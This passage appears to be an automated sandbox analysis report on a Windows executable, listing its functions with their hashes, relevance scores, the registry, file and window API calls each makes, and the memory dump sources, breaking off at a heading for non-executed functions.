Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C

Function 00402381 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004023A2
RegCloseKey.ADVAPI32(00000000), ref: 004023AB

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
Instruction ID: dc076c437d6f5be21cba980f304133fc6836ac47c1eada38d5944ea3460b530d
Opcode Fuzzy Hash: 71a5badde170228f31c4e392b74b06972dc2c03f2a8b4bc03b842f5c057287c2
Instruction Fuzzy Hash: CCF09C32B00511ABD711BBE49B8EABE76A49B40314F25043FE602B71C1DAFC4D02876D

Function 00405199 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004051A9

Part of subcall function 0040408B: SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D

CoUninitialize.COMBASE(00000404,00000000), ref: 004051F5

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
Instruction ID: 9a4107cfbe68633d7303be5c07e0fe70bc3b4157787a3ac4c512c47dfa525867
Opcode Fuzzy Hash: 4d5a35a9e69c381e3a71e49746e515aeb3c7a3ab989e8b49d3278fd537e00ed7
Instruction Fuzzy Hash: 44F02472A006009BE75067509E00B1777B0DBA0314F89043EFF84B72E0CAB548068A6D

Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E49
EnableWindow.USER32(00000000,00000000), ref: 00401E54

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
Instruction ID: 301f435b7022e7a65e96077de8e5544ac5a8ca3f4637985cbe4ed7087a67720a
Opcode Fuzzy Hash: cbece904df2faaeee2fc33aabcdec069b389f67dc9c5a953a219d05669d97587
Instruction Fuzzy Hash: DAE01272B04212AFDB14EBE5EA499EEB7B4DF40329B10443FE411F11D1DA7849419F5D

Function 00406338 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD

Function 00405B39 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405B3D
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Function 00405B14 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98

Function 0040560A Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E

Function 004022FC Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9

Function 00405E54 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74

Function 00405BE0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8

Function 00405BB1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4

Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,: Completed), ref: 00405E4A

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58

Function 0040408B Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C

Function 00404074 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18

Function 004031C4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00404061 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D

Non-executed Functions

Function 00404A44 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

